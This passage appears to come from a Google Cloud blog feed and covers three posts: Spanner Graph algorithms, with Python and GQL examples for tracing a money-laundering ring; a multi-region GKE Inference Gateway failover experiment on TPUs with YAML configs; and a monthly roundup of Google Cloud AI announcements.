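The Python sketch below implements those definitions on a hypothetical purchase graph. Spanner's implementations may differ in details such as edge direction or weighting.

```python
from math import sqrt
from typing import Dict, Hashable, Set

Neighbors = Dict[Hashable, Set[Hashable]]  # node -> set of adjacent nodes


def common_neighbors(g: Neighbors, a: Hashable, b: Hashable) -> int:
    return len(g[a] & g[b])


def total_neighbors(g: Neighbors, a: Hashable, b: Hashable) -> int:
    return len(g[a] | g[b])


def jaccard(g: Neighbors, a: Hashable, b: Hashable) -> float:
    union = total_neighbors(g, a, b)
    return common_neighbors(g, a, b) / union if union else 0.0


def cosine(g: Neighbors, a: Hashable, b: Hashable) -> float:
    denom = sqrt(len(g[a]) * len(g[b]))
    return common_neighbors(g, a, b) / denom if denom else 0.0


# Customers linked to the products they bought (hypothetical data).
purchases = {"alice": {"p1", "p2", "p3"}, "bob": {"p2", "p3", "p4"}}
print(common_neighbors(purchases, "alice", "bob"))  # 2
print(total_neighbors(purchases, "alice", "bob"))   # 4
print(jaccard(purchases, "alice", "bob"))           # 0.5
print(round(cosine(purchases, "alice", "bob"), 3))  # 0.667
```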

An integrated developer experience

You can invoke graph algorithms directly using GQL on the entire graph, on subgraphs, or on a select set of nodes and edges. Spanner offers an integrated workflow: results from graph algorithm runs can be written directly back to Spanner Graph. This lets you invoke algorithms and standard queries sequentially, using the output of one operation as input to the next. You can also store results in Cloud Storage buckets.

Example: Uncovering the ringleader of a fraudulent network

Consider a scenario where you are analyzing financial transactions to combat money laundering. Fraudsters usually manipulate a set of “mule” accounts (intermediary accounts for money laundering) that interact with one another to collectively commit fraud. To capture the teamwork between detected and hidden mule accounts, anti-fraud experts usually resort to link analysis and community detection graph algorithms. Here’s how you can use algorithms and queries together in Spanner Graph to catch them.

Step 1: Identify communities of accounts (algorithm)
First, we apply a modularity clustering algorithm to group accounts into communities, then write the resulting community_id directly back to each Account in Spanner Graph.

```
-- Runs community detection and writes the results back to the graph
EXPORT DATA OPTIONS(
  format = 'CLOUD_SPANNER',
  table = 'Account',
  write_mode = 'update_ignore_all'
) AS
GRAPH FinGraph
CALL ModularityClustering(
  node_labels => ['Account'],
  edge_labels => ['Transfer']
)
YIELD node, cluster
RETURN node.id, cluster AS community_id;
```
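Modularity clustering searches for the partition that maximizes modularity. Modularity compares the number of edges inside each community with what a random graph with the same node degrees would produce.

The Python sketch below only scores a given partition; it does not search for one. It treats Transfer edges as undirected and unweighted, which is an assumption. The search itself is far more involved, and this is not how Spanner computes it.

```python
from collections import defaultdict
from typing import Dict, Hashable, List, Tuple


def modularity(edges: List[Tuple[Hashable, Hashable]], community: Dict[Hashable, int]) -> float:
    """Newman modularity Q of a partition of an undirected, unweighted graph.

    Q = sum over communities c of (L_c / m - (d_c / (2m))^2), where m is the
    number of edges, L_c the edges inside c, and d_c the total degree of c.
    """
    m = len(edges)
    if m == 0:
        return 0.0
    inside: Dict[int, int] = defaultdict(int)  # L_c
    degree: Dict[int, int] = defaultdict(int)  # d_c
    for u, v in edges:
        degree[community[u]] += 1
        degree[community[v]] += 1
        if community[u] == community[v]:
            inside[community[u]] += 1
    return sum(inside[c] / m - (degree[c] / (2 * m)) ** 2 for c in degree)


# Two tight triangles of accounts joined by a single transfer (direction ignored).
transfers = [("a1", "a2"), ("a2", "a3"), ("a1", "a3"),
             ("b1", "b2"), ("b2", "b3"), ("b1", "b3"),
             ("a3", "b1")]
split = {"a1": 0, "a2": 0, "a3": 0, "b1": 1, "b2": 1, "b3": 1}
merged = {node: 0 for node in split}
print(f"{modularity(transfers, split):.3f}")   # 0.357
print(f"{modularity(transfers, merged):.3f}")  # 0.000
```

Splitting the two triangles scores higher than lumping every account together. A modularity-based clustering algorithm looks for exactly this kind of split.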

Step 2: Pinpoint the suspicious community (query)
Now that every account belongs to a community, we can run analytical GQL queries on each community to uncover anomalous behavior. For example, we can count the known fraud accounts within each community.

```
-- Finds the community with the highest concentration of flagged fraud
GRAPH FinGraph
MATCH (a:Account)
WHERE a.community_id IS NOT NULL
  AND a.fraud_flag = TRUE
RETURN a.community_id AS community_id, COUNT(*) AS fraud_count
ORDER BY fraud_count DESC;
```

Step 3: Calculate influence to find the "ringleader" (algorithm on a subgraph)
Let's assume the query above reveals that Community 2 has seen a massive spike in fraudulent activity. In this step, we filter the graph to isolate only the accounts in that specific community and run the PageRank algorithm to find the central ringleader within that exact group.

```
EXPORT DATA OPTIONS(
  format = 'CLOUD_SPANNER',
  table = 'Account',
  write_mode = 'update_ignore_all'
) AS
-- Specifies a suspicious subgraph
GRAPH FinGraph
MATCH (n:Account {community_id: 2})
RETURN n
FULL UNION ALL
MATCH -[e:Transfer]->
RETURN e
NEXT
-- Runs PageRank
CALL PER() PageRank(max_iterations => 20)
YIELD node, score
RETURN node.id, score AS pagerank_score;
```
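For intuition about the pagerank_score written by the query above, here is a minimal power-iteration PageRank in Python, run on a hypothetical transfer graph. `max_iterations=20` mirrors the query. The 0.85 damping factor and the even redistribution of dangling-node mass are conventional textbook choices assumed here, not documented Spanner behavior.

```python
from typing import Dict, Hashable, List


def pagerank(out_edges: Dict[Hashable, List[Hashable]], damping: float = 0.85,
             max_iterations: int = 20, tol: float = 1e-10) -> Dict[Hashable, float]:
    """Power-iteration PageRank on a directed graph; scores sum to 1."""
    nodes = set(out_edges) | {v for targets in out_edges.values() for v in targets}
    n = len(nodes)
    rank = {v: 1.0 / n for v in nodes}
    for _ in range(max_iterations):
        # Rank held by nodes with no outgoing edges is spread evenly over all nodes.
        dangling = sum(rank[v] for v in nodes if not out_edges.get(v))
        new = {v: (1.0 - damping) / n + damping * dangling / n for v in nodes}
        for u, targets in out_edges.items():
            if targets:
                share = damping * rank[u] / len(targets)
                for v in targets:
                    new[v] += share
        converged = sum(abs(new[v] - rank[v]) for v in nodes) < tol
        rank = new
        if converged:
            break
    return rank


# Four mule accounts all pay "boss", who sends money back to two of them.
transfers = {
    "m1": ["boss"], "m2": ["boss"], "m3": ["boss"], "m4": ["boss"],
    "boss": ["m1", "m2"],
}
scores = pagerank(transfers, max_iterations=20)
for account, score in sorted(scores.items(), key=lambda kv: -kv[1]):
    print(f"{account}: {score:.3f}")
```

The account that collects funds from the most (and most central) accounts ends up with the highest score, which is why step 4 sorts by pagerank_score to find the ringleader.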

Step 4: Investigate the target (query)
Now that the accounts in Community 2 have a pagerank_score, we can write a query that isolates the most central account and immediately traces where that ringleader recently moved funds.

```
-- Finds the top scorer (ringleader) and traces their money
GRAPH FinGraph
MATCH (ringleader:Account {community_id: 2})
ORDER BY ringleader.pagerank_score DESC
LIMIT 1
WITH ringleader
MATCH (ringleader)-[e:Transfer]->{1, 5}(receiver:Account)
WHERE e.ts > '2025-12-01'
RETURN ringleader.id AS ringleader_id, receiver.id AS receiver_id, e.amount, e.ts;
```
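The traversal in this query can be approximated in Python with a breadth-first search on a hypothetical in-memory adjacency list. The search follows only transfers newer than a cutoff, for 1 to 5 hops.

This is a simplification. The GQL quantified path pattern matches individual paths, so one receiver can appear in several rows. This sketch instead reports each account once, at its shortest distance, and never revisits the source.

```python
from collections import deque
from datetime import datetime
from typing import Dict, List, Tuple

Transfer = Tuple[str, float, datetime]  # (receiver_id, amount, timestamp)


def receivers_within_hops(transfers: Dict[str, List[Transfer]], source: str,
                          since: datetime, max_hops: int = 5) -> Dict[str, int]:
    """Map each account reachable from `source` via 1..max_hops transfers newer
    than `since` to its smallest hop count (breadth-first search)."""
    hops_to: Dict[str, int] = {}
    visited = {source}
    frontier = deque([(source, 0)])
    while frontier:
        account, hops = frontier.popleft()
        if hops == max_hops:
            continue  # do not expand past the hop limit
        for receiver, _amount, ts in transfers.get(account, []):
            if ts <= since or receiver in visited:
                continue
            visited.add(receiver)
            hops_to[receiver] = hops + 1
            frontier.append((receiver, hops + 1))
    return hops_to


flows = {
    "boss": [("m1", 900.0, datetime(2025, 12, 5)), ("old", 50.0, datetime(2025, 11, 1))],
    "m1": [("m2", 880.0, datetime(2025, 12, 6))],
    "m2": [("boss", 10.0, datetime(2025, 12, 7))],
}
print(receivers_within_hops(flows, "boss", since=datetime(2025, 12, 1)))  # {'m1': 1, 'm2': 2}
```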

By allowing you to weave high-performance algorithms with standard GQL queries, Spanner Graph eliminates the need to move data back and forth between operational databases and external analytics engines. This unified approach dramatically simplifies your data architecture and accelerates your time to insight.

Trusted by industry leaders

Customers like DaVita, Yahoo!, SoundCloud, and WPP are already leveraging Spanner Graph algorithms to solve some of their most complex data challenges.

"Leveraging Spanner Graph for our Patient 360 initiative has allowed us to consolidate complex healthcare data into a single, unified view. The addition of native graph algorithms like community detection and centrality is a major step forward, enabling us to uncover deep insights within our patient networks faster and at scale. These fully managed capabilities allow our team to focus on driving innovation in patient care without the operational burden of managing complex data pipelines." - Sam Ghosh, Chief Enterprise Architect at DaVita Kidney Care

"Operating at global scale across Yahoo’s iconic consumer properties requires us to unify billions of user profiles into a single, real-time view. With Spanner Graph, we’ve modeled our Unified User Profile (UUP) as a graph, bringing together previously distributed systems into a centralized source of truth. The addition of fully managed graph algorithms on Spanner further accelerates our ability to deliver personalization at scale. By leveraging algorithms such as community detection and PageRank, we can drive deeper audience segmentation and power more relevant, engaging user experiences across our platform." - Chris James, Director of Engineering, Yahoo

"With 500+ million tracks from 40+ million artists across 190+ countries, SoundCloud is where emerging artists find their sound, hidden gems are discovered, and music culture is shaped in real time. We have been running graph algorithms in batch mode for years, with processes often taking multiple hours on custom clusters to analyze our massive, multi-billion-edge music graph. The launch of Spanner Graph algorithms is a true game-changer: It not only provides the massive scalability we need, but also allows us to move away from complex custom Python workflows to a fully managed service. Most importantly, it unlocks the ability to run graph algorithms on our most up-to-date data for use cases like identifying creator hubs and improving recommendations, without requiring complex ETL pipelines or impacting the low-latency transactional workloads running on Spanner today." - Sergey Chekanskiy, VP of Engineering - Data Foundation, SoundCloud

“We've been eager to leverage advanced graph algorithms for Open Intelligence, our foundational intelligence layer that securely connects trillions of live data points from clients, partners and WPP in a privacy-first way and that is now integrated and powers WPP’s agentic marketing platform, WPP Open. In order to have instant, exploratory access to complex relationships across billions of entities – driving planning, modelling, and experimentation — we need native support for deep graph traversal, structural pattern recognition, and advanced algorithms. Algorithm support on Spanner Graph provides the performance and scalability to tackle our most challenging graph analytics problems without operational overhead or expensive licensing." - Rob Marshall, Head of Strategy, Data & Intelligence, WPP

Build more intelligent applications

Now, with native support for algorithms in Spanner Graph, you can move beyond basic relationship traversals and run deep structural analytics directly on your freshest transaction data. By applying these classic graph algorithms at scale, you can unlock new capabilities for your enterprise applications:

Proactive fraud detection and anti-money laundering: Expose coordinated fraud rings by automatically grouping connected mule accounts with community detection (like modularity clustering), then apply centrality (like PageRank) to pinpoint the ringleader who controls the illegal fund flow.
Customer 360 and entity resolution: Unify fragmented, cross-channel data into a single canonical profile using similarity functions like Jaccard and community detection like label propagation. These profiles can be further enriched for downstream ML training by generating topological features, such as PageRank, for each node.
Autonomous network operations and digital twins: Model your IT or telecom infrastructure as a digital twin, using similarity and path finding (like set-to-set shortest path) to proactively identify critical vulnerabilities and predict cascading failures.
Hyper-personalized product recommendations: Move beyond basic purchase histories by analyzing broader user behaviors. Use similarity algorithms (like common neighbors) to find overlapping preferences between entities, and centrality (like personalized PageRank) to surface the most relevant recommendations for those peer groups.
Resilient supply chain and logistics: Protect your supply chain from hidden bottlenecks using centrality (like betweenness centrality) to pinpoint over-relied-upon distribution hubs, and path finding to instantly calculate efficient alternative routes during disruptions.
Cybersecurity threat hunting and blast-radius analysis: Accelerate threat hunting by applying community detection (like correlation clustering) to isolate anomalous machine communications, and path finding to trace the attacker's exact lateral movement and blast radius.
Predictive customer churn analysis: Stop contagious customer churn by mapping out tight-knit subscriber groups with community detection, then apply centrality to identify and target core influencers with retention promotions before the churn spreads.

Get started today

Spanner Graph algorithms are supported with the Enterprise and Enterprise+ editions of Spanner. To learn more, view the documentation or try out this codelab. You can also watch this video for a summary of graph algorithm support with Spanner Graph.

Experimenting with TPUs, GKE Managed DRANET, and Multi-cluster Inference Gateway

Tue, 02 Jun 2026 07:00:00 +0000

What happens when your workload fails in one region but your users still need access to the service? This is a common availability and uptime concern. The Kubernetes ecosystem has recently gained capabilities such as Dynamic Resource Allocation (DRA) and Inference Gateway. I decided to experiment with them in Google Cloud, using a simple AI inference workload as the test case.

In this blog, we explore this setup. You can also jump straight to the detailed configs in the codelab Build multi-cluster GKE Inference Gateway, with TPUs, Cloud Storage FUSE and managed DRANET.

Building blocks

To build out this experiment, use the following products, features, and tools:

Google Kubernetes Engine (GKE) managed DRANET: A managed feature that lets you request and share resources among Pods. It supports GPUs and TPUs. In this test, TPUs in two different regions were used, with networking assigned using managed DRANET.
Multi-cluster GKE Inference Gateway: Load balances your AI/ML inference workloads across multiple GKE clusters. It also handles failover, which is what my experiment was designed to test. The GatewayClass that supports this is the multi-cluster cross-region internal Application Load Balancer, gke-l7-cross-regional-internal-managed-mc.
Cloud Storage FUSE: Lets Pods mount a Cloud Storage bucket as a file system, so data, models, checkpoints, and logs can be stored directly in Cloud Storage. To speed up deployment, an open Gemma model was downloaded to this bucket for retrieval.
Virtual Private Cloud (VPC): The foundational global network providing isolated, secure communication for the internal load balancers and compute nodes.
GKE Fleets: Fleets group the separate regional clusters under a unified management control plane.
TPU v6e: Google's custom AI accelerators that provide the high-performance compute required to serve the model. The machine type used was ct6e-standard-4t in a 2x2 slice.

Design pattern example

The aim is to deploy an LLM (Gemma 3) onto two GKE clusters in different regions, with each cluster using four TPU v6e chips. The model is stored in Cloud Storage. The workload is served through GKE Inference Gateway, which supports multiple clusters. Traffic should be routed to the region closest to the user and fail over to the other region if one region fails.
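The intended routing behavior can be captured as a simplified mental model in Python:

- send traffic to the closest healthy region that still has headroom;
- otherwise, use the least-loaded healthy region;
- fail over entirely when a region is unhealthy.

The `RegionBackend` type and `pick_region` function are hypothetical. The 60% cap mirrors the `maxUtilizationPercent: 60` setting in the GCPBackendPolicy shown in this post. The real load balancer's distribution algorithm is more nuanced, and this sketch does not reproduce it.

```python
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class RegionBackend:
    region: str
    rtt_ms: float              # client-to-region round-trip time (lower is closer)
    healthy: bool              # outcome of the /health check
    kv_cache_util_pct: float   # custom metric, such as vLLM KV-cache usage


def pick_region(backends: List[RegionBackend], max_util_pct: float = 60.0) -> Optional[str]:
    """Closest healthy region under the utilization cap; otherwise the least
    loaded healthy region; None when no region is healthy."""
    healthy = [b for b in backends if b.healthy]
    if not healthy:
        return None
    with_headroom = [b for b in healthy if b.kv_cache_util_pct < max_util_pct]
    if with_headroom:
        return min(with_headroom, key=lambda b: b.rtt_ms).region
    return min(healthy, key=lambda b: b.kv_cache_util_pct).region


eu = RegionBackend("europe-west4", rtt_ms=12, healthy=True, kv_cache_util_pct=35)
us = RegionBackend("us-east5", rtt_ms=95, healthy=True, kv_cache_util_pct=20)
print(pick_region([eu, us]))  # europe-west4: closest, with headroom
eu.healthy = False
print(pick_region([eu, us]))  # us-east5: failover
```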

Putting it together

To use TPUs in two regions, make sure your project has the necessary TPU quota in both regions.

Begin: Set up the environment.

Create a standard VPC with a subnet in each region where your TPU reservations are located.
Create a proxy-only subnet in each region. These subnets are used by the internal Application Load Balancer that backs the GKE Inference Gateway.
Set up firewall rules allowing traffic and health checks.
Reserve static internal IP addresses in both regions for the Gateway.
Provision a Cloud Storage bucket for the model and configure a dedicated IAM service account. Bind it to a Kubernetes service account through Workload Identity so your Pods can securely mount the bucket with Cloud Storage FUSE and read the model weights directly.

Next: Create standard GKE clusters and node pools.

Deploy two separate GKE clusters, one in each of your chosen regions.
Enable the Gateway API (--gateway-api=standard) and the Cloud Storage FUSE CSI driver (--addons GcsFuseCsiDriver) during cluster creation.
Create dedicated TPU v6e node pools (ct6e-standard-4t) for both clusters.
Enable managed DRANET on these TPU node pools by setting the flags --accelerator-network-profile=auto and --node-labels=cloud.google.com/gke-networking-dra-driver=true.

Next: Establish the global mesh via Fleet Registration.

Register both GKE clusters to a unified GKE Fleet by following the fleet creation and registration setup.
Enable Multi-Cluster Service Discovery and Multi-Cluster Ingress on your fleet.
Designate your primary region as the configuration hub to act as the control plane for routing rules across both regions.

Next: Deploy the AI workload.

Use a temporary Kubernetes job to download the Gemma 3 (gemma-3-27b-it) model weights directly into your Cloud Storage bucket.
Define a ResourceClaimTemplate that explicitly requests the managed DRANET device class (deviceClassName: netdev.google.com) with the allocation mode set to "All".

```yaml
apiVersion: resource.k8s.io/v1
kind: ResourceClaimTemplate
metadata:
  name: all-netdev
  namespace: default
spec:
  spec:
    devices:
      requests:
        - name: req-netdev
          exactly:
            deviceClassName: netdev.google.com
            allocationMode: All
```

Deploy your inference server (for example, vLLM) on the TPU nodes in both regions. Ensure the Pod spec uses node selectors for the 2x2 TPU topology, requests exactly 4 TPUs, and references the netdev resource claim. This ensures your Pods use the dedicated accelerator networking alongside standard Ethernet.

Next: Configure the Multi-Cluster Inference Gateway.

Install the necessary Custom Resource Definitions (CRDs) so Kubernetes can process specialized routing objects like the InferenceObjective.
Deploy an AutoscalingMetric to track hardware utilization, such as KV cache usage.
Use Helm to group the independent AI deployments from both regions into a single, logical InferencePool.
Deploy the Cross-Region Gateway and its associated HTTPRoute to manage incoming global traffic.
Apply health checks and backend policies to the pool to ensure load balancing relies on your custom hardware metrics.

Configure an InferenceObjective to instruct the gateway to route prompts to the region with the highest availability, avoiding overloaded TPUs.

```yaml
apiVersion: gateway.networking.k8s.io/v1
kind: Gateway
metadata:
  name: cross-region-gateway
  namespace: default
spec:
  gatewayClassName: gke-l7-cross-regional-internal-managed-mc
  addresses:
  - type: networking.gke.io/named-address-with-region
    value: "regions/europe-west4/addresses/gemma-gateway-ip-europe-west4"
  - type: networking.gke.io/named-address-with-region
    value: "regions/us-east5/addresses/gemma-gateway-ip-us-east5"
  listeners:
  - name: http
    protocol: HTTP
    port: 80
---
apiVersion: gateway.networking.k8s.io/v1
kind: HTTPRoute
metadata:
  name: gemma-route
  namespace: default
spec:
  parentRefs:
  - name: cross-region-gateway
    kind: Gateway
  rules:
  - backendRefs:
    - group: networking.gke.io
      kind: GCPInferencePoolImport
      name: gemma-pool
      port: 8000
---
apiVersion: networking.gke.io/v1
kind: HealthCheckPolicy
metadata:
  name: gemma-health-check
  namespace: default
spec:
  targetRef:
    group: networking.gke.io
    kind: GCPInferencePoolImport
    name: gemma-pool
  default:
    config:
      type: HTTP
      httpHealthCheck:
        requestPath: /health
        port: 8000
---
apiVersion: networking.gke.io/v1
kind: GCPBackendPolicy
metadata:
  name: gemma-backend-policy
  namespace: default
spec:
  targetRef:
    group: networking.gke.io
    kind: GCPInferencePoolImport
    name: gemma-pool
  default:
    timeoutSec: 100
    balancingMode: CUSTOM_METRICS
    trafficDuration: LONG
    customMetrics:
    - name: gke.named_metrics.tpu-cache
      dryRun: false
      maxUtilizationPercent: 60
---
apiVersion: autoscaling.gke.io/v1beta1
kind: AutoscalingMetric
metadata:
  name: tpu-cache
  namespace: default
spec:
  selector:
    matchLabels:
      app: gemma-server
  endpoints:
  - port: 8000
    path: /metrics
    metrics:
    - name: vllm:kv_cache_usage_perc
      exportName: tpu-cache
---
apiVersion: inference.networking.x-k8s.io/v1alpha2
kind: InferenceObjective
metadata:
  name: gemma-objective
  namespace: default
spec:
  priority: 10
  poolRef:
    name: gemma-pool
    group: "inference.networking.k8s.io"
```
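The AutoscalingMetric in the configuration above scrapes vllm:kv_cache_usage_perc from each pod's /metrics endpoint on port 8000 and exports it as tpu-cache, and the GCPBackendPolicy caps that signal at 60%. To sanity-check what a pod is actually reporting, the following minimal Python sketch reads the Prometheus text exposition and converts the gauge to a percentage. It assumes vLLM reports the gauge as a 0 to 1 fraction, and the port-forward workflow mentioned in the comment is a hypothetical setup, not part of the managed pipeline.

```python
import urllib.request

METRIC = "vllm:kv_cache_usage_perc"


def read_gauge(exposition: str, metric: str = METRIC) -> list[float]:
    """Return every sample value of `metric` from Prometheus text-format output."""
    samples = []
    for raw in exposition.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):  # skip blank, HELP, and TYPE lines
            continue
        if "{" in line:
            name = line[: line.index("{")]
            rest = line[line.rindex("}") + 1 :]  # text after the label set
        else:
            name, _, rest = line.partition(" ")
        if name == metric:
            samples.append(float(rest.split()[0]))  # ignore an optional timestamp
    return samples


def kv_cache_percent(exposition: str) -> float:
    """Highest KV cache usage across engines, as a 0-100 percentage."""
    values = read_gauge(exposition)
    if not values:
        raise ValueError(f"{METRIC} not found")
    return max(values) * 100  # assumes vLLM reports a 0-1 fraction


def fetch_metrics(url: str) -> str:
    # Hypothetical usage after `kubectl port-forward` to a gemma-server pod:
    # kv_cache_percent(fetch_metrics("http://localhost:8000/metrics"))
    with urllib.request.urlopen(url, timeout=5) as resp:
        return resp.read().decode("utf-8")
```

A value near or above 60 means the load balancer should start steering new requests away from that backend.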

Testing the Failover

Verify the highly available architecture by simulating a primary region outage. Once the primary deployment is taken offline, the Gateway automatically detects the failure and seamlessly reroutes all subsequent user requests to the active secondary cluster, ensuring continuous availability without dropping traffic.
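To reason about what the failover test should show, here is a deliberately simplified Python model of health-aware, metric-aware routing. It is not the actual Cloud Load Balancing algorithm. The rules are assumptions: stay in the local region while it is healthy and under the 60% cap from the GCPBackendPolicy, otherwise spill to the least-loaded healthy region. Treating europe-west4 as the primary region is also hypothetical.

```python
from dataclasses import dataclass

MAX_UTILIZATION_PCT = 60  # mirrors maxUtilizationPercent in the GCPBackendPolicy


@dataclass
class RegionBackend:
    name: str
    healthy: bool        # result of the /health check
    kv_cache_pct: float  # exported tpu-cache metric, 0-100


def choose_region(backends: list[RegionBackend], local: str) -> str:
    """Toy model: prefer the local region, spill over on overload or failure."""
    healthy = [b for b in backends if b.healthy]
    if not healthy:
        raise RuntimeError("no healthy backends in any region")
    with_headroom = [b for b in healthy if b.kv_cache_pct < MAX_UTILIZATION_PCT]
    # Stay local while the local region is healthy and under the cap.
    for b in with_headroom:
        if b.name == local:
            return b.name
    # Otherwise send traffic to the least-loaded healthy region.
    candidates = with_headroom or healthy
    return min(candidates, key=lambda b: b.kv_cache_pct).name
```

Taking the primary deployment offline corresponds to setting healthy=False for europe-west4, after which every request in the model lands in us-east5.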

Next Steps

For a deeper dive, including a hands-on codelab and more information on these features, review the following resources:

Hands-on Codelab: Build multi-cluster GKE Inference Gateway, with TPUs, Cloud Storage FUSE, and managed DRANET
Document set: DRANET
Documentation: AI Hypercomputer

Want to ask a question, find out more, or share a thought? Please connect with me on LinkedIn.

What Google Cloud announced in AI this month

Mon, 01 Jun 2026 16:00:00 +0000

Editor’s note: Want to keep up with the latest from Google Cloud? Check back here for a monthly recap of our latest updates, announcements, resources, events, learning opportunities, and more.

We’ve had a busy month! Between announcing Gemini Spark and Gemini 3.5 at Google I/O and unveiling Google AI Threat Defense, our latest AI-powered cybersecurity solution, we had a lot to share with Google Cloud customers. Keeping up with the latest news takes time, so we gathered the most important announcements, thought leadership, and technical guides in one place to help you quickly catch up.

To learn more about our I/O announcements, here’s everything you need to know for Google Cloud customers, and top news for startups.

Top announcements

Introducing Google AI Threat Defense to help you outpace the adversary: Google Cloud is introducing a comprehensive AI-powered cybersecurity solution — Google AI Threat Defense — an always-on autonomous security platform. Learn more here.

Gemini 3.5: Our latest family of models combines frontier intelligence with action – starting with Gemini 3.5 Flash.
Gemini Omni: Our new model is a leap forward in world understanding, multimodality, and editing, letting you generate any output from any input, starting with video.
Google Antigravity: Google Antigravity’s expanded capabilities and new integration with Agent Platform bring agentic development to your entire organization.
Gemini Spark: For Gemini Enterprise and Workspace customers, Gemini Spark is your 24/7 personal AI agent that helps you work more efficiently by autonomously taking action on your behalf, under your direction.
Google Workspace: Google Pics, our new image generation and editing tool, and new voice features in Gmail, Docs and Keep, help reimagine how you work.
Managed Agents API on Agent Platform: Allows developers to build and run custom agents inside secure, Google-hosted environments that seamlessly integrate with Agent Platform.
CodeMender: A powerful AI security agent provided through Agent Platform, CodeMender can help find and fix vulnerabilities in your code.

Nano Banana 2 and Nano Banana Pro are generally available: Available today via Gemini Enterprise Agent Platform, organizations are already putting the models to work. Learn more here.

Thought leadership (editor’s pick):

Cloud CISO Perspectives: How Google + Wiz changes multicloud strategy for CISOs: Vinod D’Souza, director, Office of the CISO, shares highlights from his RSA Conference fireside chat with Anthony Belfiore, chief strategy officer, Wiz. While threat actors have seen gains from the adversarial misuse of AI, Google and Wiz are tackling these challenges head-on by combining Wiz's deep cloud telemetry with Google's world-class AI and quantum research to help CISOs and their organizations meet the needs of the agentic enterprise era. Read more here.

News you can use:

What Google I/O '26 means for developing agents on Google Cloud: We dig into how Gemini Enterprise Agent Platform and the new developer tools shared at I/O fit together, unpack the spectrum of choices for building, and share what we’d actually try first. Learn more here.

Five must-have guides to move agents into production with Gemini Enterprise Agent Platform: Here is a look back at our five-part series covering the architecture patterns and best practices you need to move your agents into production. Learn more here.
How to build an AI-ready security program for the public sector: From industrial control systems to decades-old municipal databases, here’s our CISO guidance to prep AI-ready security programs for the public sector. Learn more here.

Stay tuned for monthly updates on Google Cloud’s AI announcements, news, and best practices. For a deeper dive into the latest from Google Cloud customers, read our monthly recap, Cool stuff customers built.


April

We hosted Google Cloud Next in Las Vegas on April 22, announcing incredible innovations from Gemini Enterprise Agent Platform to our eighth-generation TPUs. We also expanded the Gemini Enterprise app in collaborative ways: with new features like Projects, you can now work side-by-side with your agents and colleagues.

If you missed the livestream, take a look at our Day 1 recap. It’s been incredible to see how customers have been applying AI in thousands of ways — so far, we’ve counted more than 1,300 examples.

Top announcements

1. Gemini Enterprise Agent Platform: Our new, comprehensive platform to build, scale, govern, and optimize agents. Moving forward, all Vertex AI services and roadmap evolutions will be delivered exclusively through the Agent Platform, rather than as a standalone service, to power the next generation of agent development.

The platform is designed around four core pillars — build, scale, govern, and optimize — that allow teams to collaborate seamlessly. Learn more about Agent Platform here.

2. Gemini Enterprise app: The Gemini Enterprise app has all the key components to let teams discover, create, share, and run AI agents in a single environment. At Next ’26, we introduced several new capabilities in the Gemini Enterprise app:

Agent Designer uses the same no-code agent designer experience as Agent Platform and lets employees build sophisticated schedule- and trigger-based agents using any enterprise connector. It gives you a virtual flowchart of your agent, allowing you to inspect, test, and approve workflows, ensuring total transparency for executing critical business processes.
Long-running agents are designed to execute complex business processes. They can work autonomously in secure cloud sandboxes, giving agents the ability to orchestrate business logic, write code to build custom tools, and complete multi-step work like reconciliation activities or sales prospect sequencing — without needing constant prompting.
Inbox in Gemini Enterprise provides a central location to monitor, guide, and help manage all of your agent activity, including your long-running agents. Notifications are intuitively categorized into actionable groups like "Needs your input," "Errors," and "Completed."
Projects create a dedicated space where the agent’s memory is confined to the files and conversations your team adds. By connecting it to data sources including Google Drive, NotebookLM, and Google Group Chats, the agent becomes an expert on a specific topic and can provide team members daily briefings or status updates without digging through months of documents.
Skills create simple shortcuts using an “@” mention for repetitive tasks such as applying brand guidelines, formatting a report, and accessing specific data.
Canvas gives our customers an interactive editor directly within Gemini Enterprise. It allows teams to easily create and edit Docs and Slides, and even export to Microsoft 365 files, within the same experience.
Agent Gallery provides access to third-party agents from partners like Adobe, Atlassian, Lovable, and ServiceNow, and is adding more third-party connectors for Asana, Mailchimp, Workday, and more. These integrations enable your agents to retrieve data and execute tasks with your systems-of-record.

3. AI Hypercomputer: Designed specifically for demanding AI workloads, our AI Hypercomputer is an advanced, purpose-built architecture that unites performance-optimized hardware for compute, storage, networking, open software and machine learning frameworks — as well as flexible consumption models — into a single, integrated system. We are announcing innovations at every layer of the AI Hypercomputer:

TPU 8t, optimized for training, uses breakthrough Inter-Chip Interconnect (ICI) technology to scale up to 9,600 TPUs and 2 PB of shared, high-bandwidth memory in a single superpod. It achieves 3x the processing power of Ironwood and delivers up to 2x more performance/Watt.
TPU 8i, optimized for inference, uses our new Boardfly topology to directly connect 1,152 TPUs in a single pod. It features 3x more on-chip SRAM compared to previous versions to host larger KV caches entirely on-silicon and integrates a specialized Collectives Acceleration Engine. Taken together, TPU 8i delivers 80% better performance per dollar for inference than the prior generation, enabling millions of concurrent agents to run cost-effectively.

4. The Agentic Data Cloud: A new data architecture built for the speed and scale of agentic AI. The Agentic Data Cloud delivers an AI-native architecture, allowing agents to perceive, reason, and act on your behalf in real-time, including:

Cross-Cloud Lakehouse, standardized on Apache Iceberg, is our lakehouse that enables you to leave your data in AWS or Azure (coming later this year) while querying it instantly, without the friction of vendor lock-in or the cost of data movement.
Knowledge Catalog constructs a unified, dynamic context graph of your entire business enabling you to ground agents in all of your business data and semantics. With Smart Storage and the Object Context API, files in Google Cloud Storage are instantly tagged and enriched with metadata before an agent touches them. Then our Knowledge Engine uses Gemini to autonomously tag, define logic and instantly map complex relationships across your entire enterprise, providing the semantic definition your agents have been missing.

5. Protecting the agentic enterprise: Security built for the AI era. Our full-stack AI approach, from the chips to the models, gives you a competitive advantage with better integration and velocity to help protect customers. Not only can Google action insights from the world’s largest threat observatory and Mandiant frontline experts, but we also bring cutting-edge insights and breakthroughs from Google DeepMind, to help make your platforms more secure.

Agentic defense: Three new agents in Google Security Operations can help hunt threats, engineer detections, and provide context on third parties. You can build your own security agents with remote Google Cloud model context protocol (MCP) server support for Google Security Operations, now generally available. You can also access the MCP server client directly from the Google Security Operations chat interface, available in preview.
Protecting AI and cloud apps across any infrastructure with Wiz: Newly expanded AI coverage helps build secure agents across clouds and AI studios. A new AI Bill of Materials in development tools can help secure AI-generated code and mitigate the risk of shadow AI. Learn more.
Securing agents and the agentic web: Model Armor can integrate with Agent Gateway, and new Agent Identities provide more layers of defense against shadow AI. Google Cloud Fraud Defense, the next evolution of reCAPTCHA, offers agent-specific capabilities that can help secure the agentic web as well as the entire user and customer journey.
